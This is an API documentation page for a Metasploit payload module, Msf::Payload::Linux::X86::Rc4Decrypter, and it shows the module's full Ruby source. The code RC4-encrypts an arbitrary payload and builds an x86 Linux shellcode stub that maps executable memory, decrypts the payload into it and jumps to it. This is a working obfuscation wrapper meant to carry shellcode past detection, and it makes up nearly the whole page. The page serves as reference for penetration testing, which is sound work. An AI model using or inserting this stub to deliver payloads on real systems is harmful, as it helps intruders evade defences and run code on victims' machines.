Module: Msf::Payload::Linux::X86::Rc4Decrypter

Defined in:
lib/msf/core/payload/linux/x86/rc4_decrypter.rb

Instance Method Summary collapse

Instance Method Details

#rc4_decrypter(opts = {}) ⇒ Object

Raises:

  • (ArgumentError) 


112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
 
# File 'lib/msf/core/payload/linux/x86/rc4_decrypter.rb', line 112

def rc4_decrypter(opts = {})
  key            = opts[:key] || Rex::Text.rand_text(16)
  payload        = opts[:data] || raise(ArgumentError, "Encrypted data required")
  raise(ArgumentError, "Key must be <= 256 bytes") if key.length > 256

  encrypted_data = Rex::Crypto::Rc4.rc4(key, payload)

  stub = rc4_decrypter_stub(
    key_size:       key.length,
    payload_size:   payload.length,
    encrypted_size: encrypted_data.length
  )

  stub << key.ljust(256, "\x00")
  stub << encrypted_data
end

#rc4_decrypter_stub(key_size: 0, payload_size: 0, encrypted_size: 0) ⇒ Object 



3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
 
# File 'lib/msf/core/payload/linux/x86/rc4_decrypter.rb', line 3

def rc4_decrypter_stub(key_size: 0, payload_size: 0, encrypted_size: 0)
  asm = <<-ASM
_start:
    jmp _get_data_addr

_got_data_addr:
    pop ebp

    ; mmap(NULL, payload_size, PROT_RWX, MAP_PRIVATE|MAP_ANON, -1, 0)
    xor eax, eax
    push eax
    push 0xffffffff
    push 0x22
    push 7
    push #{payload_size}
    xor eax, eax
    push eax
    mov al, 0x5a
    mov ebx, esp
    int 0x80
    add esp, 24
    push eax

    ; Allocate S-box (256 bytes) on stack
    sub esp, 256
    mov edi, esp

    ; Initialize S-box: S[i] = i for i = 0..255
    xor ecx, ecx
_init_sbox:
    mov byte [edi+ecx], cl
    inc cl
    jnz _init_sbox

    ; RC4 Key Scheduling Algorithm (KSA)
    xor esi, esi
    xor ebx, ebx

_ksa_loop:
    movzx eax, byte [edi+esi]
    add ebx, eax

    mov eax, esi
    xor edx, edx
    push ebx
    mov ecx, #{key_size}
    div ecx
    pop ebx
    movzx eax, byte [ebp+edx]
    add ebx, eax
    and ebx, 0xff

    movzx eax, byte [edi+esi]
    movzx ecx, byte [edi+ebx]
    mov byte [edi+esi], cl
    mov byte [edi+ebx], al

    inc esi
    cmp esi, 256
    jb _ksa_loop

    ; RC4 Pseudo-Random Generation Algorithm (PRGA)
    xor esi, esi
    xor ebx, ebx
    xor ecx, ecx

_prga_loop:
    inc esi
    and esi, 0xff

    movzx eax, byte [edi+esi]
    add ebx, eax
    and ebx, 0xff

    movzx eax, byte [edi+esi]
    movzx edx, byte [edi+ebx]
    mov byte [edi+esi], dl
    mov byte [edi+ebx], al

    add eax, edx
    and eax, 0xff
    movzx eax, byte [edi+eax]

    push ebx
    lea edx, [ebp+256]
    xor al, byte [edx+ecx]
    mov edx, dword [esp+260]
    mov byte [edx+ecx], al
    pop ebx

    inc ecx
    cmp ecx, #{encrypted_size}
    jb _prga_loop

    add esp, 256                    ; deallocate S-box
    pop eax                         ; eax = output buffer address
    jmp eax                         ; jump to decrypted payload

_get_data_addr:
    call _got_data_addr

; Data section layout:
; offset +0:   key_data (256 bytes)
; offset +256: encrypted_data (variable length)
  ASM

  Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end